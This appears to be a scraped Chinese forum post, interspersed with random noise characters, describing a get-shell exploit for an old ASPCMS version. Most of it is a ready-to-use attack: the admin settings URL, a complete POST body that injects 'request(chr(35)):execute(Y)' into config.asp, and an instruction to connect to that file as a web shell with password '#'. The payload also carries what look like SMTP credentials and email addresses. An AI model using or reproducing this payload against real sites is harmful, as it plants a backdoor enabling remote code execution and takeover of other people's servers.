老的ASPCMS版本的秒杀拿SHELL漏洞
. ^- A# U+ V4 T; E7 c3 Q0 W# q2 l2 ~2 f4 J; n( o/ q! O, b4 T
找到后台。。。然后% X4 q, r. m7 Q! N& v5 p# M
' }7 d2 [% z7 o$ b( u4 l7 B3 Q
/admin/_system/AspCms_SiteSetting.asp?action=saves
1 K& ^' @+ e. M# v' v- _* D, o
# I. D1 f5 H: _" L, @" ^/ e' F [7 f直接POST
. X9 S1 Y6 P0 ]' B0 }% p% j, |" m 1 [6 _- d7 j. M
runMode=1&siteMode=1&siteHelp=%B1%BE%CD%F8%D5%BE%D2%F2%B3%CC%D0%F2%C9%FD%BC%B6%B9%D8%B1%D5%D6%D0&SwitchComments=1&SwitchCommentsStatus=1&switchFaq=0:Y=request(chr(35)):execute(Y)&SwitchFaqStatus=0&dirtyStr=&waterMark=1&waterMarkFont=hahahaha&waterMarkLocation=1&smtp_usermail=aspcmstest%40163.com&smtp_user=aspcmstest&smtp_password=aspcms.cn&smtp_server=smtp.163.com&MessageAlertsEmail=13322712%40qq.com&messageReminded=1&orderReminded=1&applyReminded=1&commentReminded=1&LanguageID=1/ `$ c& R, q3 D) E1 ]
$ s% w9 Y, Y5 `% H& Q/ f1 E; ~& e
再连接配置文件config.asp 密码为#8 n$ W; H3 h7 E# j0 L2 S! E
|